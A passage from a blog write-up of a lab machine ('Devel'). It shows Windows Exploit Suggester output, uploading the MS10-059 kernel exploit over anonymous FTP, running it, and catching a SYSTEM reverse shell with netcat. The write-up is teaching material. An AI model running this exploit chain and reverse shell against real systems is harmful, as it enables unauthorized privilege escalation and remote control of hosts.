volmgr       Volume Manager Driver  Kernel        14/7/2009 2:11:25
volmgrx      Dynamic Volume Manager Kernel        14/7/2009 2:11:41
volsnap      Storage volumes        Kernel        14/7/2009 2:11:34
vsmraid      vsmraid                Kernel        31/1/2009 3:13:29
vsock        vSockets Virtual Machi Kernel        22/6/2016 11:07:52
vwifibus     Virtual WiFi Bus Drive Kernel        14/7/2009 2:52:02
WacomPen     Wacom Serial Pen HID D Kernel        14/7/2009 2:46:53
WANARP       Remote Access IP ARP D Kernel        14/7/2009 2:55:02
Wanarpv6     Remote Access IPv6 ARP Kernel        14/7/2009 2:55:02
Wd           Wd                     Kernel        14/7/2009 2:11:31
Wdf01000     Kernel Mode Driver Fra Kernel        14/7/2009 2:11:36
WfpLwf       WFP Lightweight Filter Kernel        14/7/2009 2:53:51
WIMMount     WIMMount               File System   14/7/2009 2:17:57
WmiAcpi      Microsoft Windows Mana Kernel        14/7/2009 2:19:16
ws2ifsl      Windows Socket 2.0 Non Kernel        14/7/2009 2:55:01
WudfPf       User Mode Driver Frame Kernel        14/7/2009 2:50:13

c:\windows\system32\inetsrv>

Exploit Suggester

Devel Machine

C:> systeminfo > systeminfo.txt

Kalibox

#  ./windows-exploit-suggester.py --database 2019-09-10-mssb.xls --systeminfo systeminfo.txt[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 179 potential bulletins(s) with a database of 137 known exploits
[*] there are now 179 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 32-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*]   http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*]   http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[*] done

Working Exploit

MS10-059 worked and I got the binary from https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe.

On Kalibox

ftp 10.10.10..5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp> put  MS10-059.exe

Devel Machine

c:\inetpub\wwwroot>MS10-059.exe
MS10-059.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
c:\inetpub\wwwroot>MS10-059.exe YOUR-IP 4444
MS10-059.exe YOUR-IP 4444

On Kalibox

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [YOUR-IP] from (UNKNOWN) [10.10.10.5] 49160
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.c:\inetpub\wwwroot>whoami
whoami
nt authority\system


You'll only receive email when BreakBeforeMake publishes a new post

More from BreakBeforeMake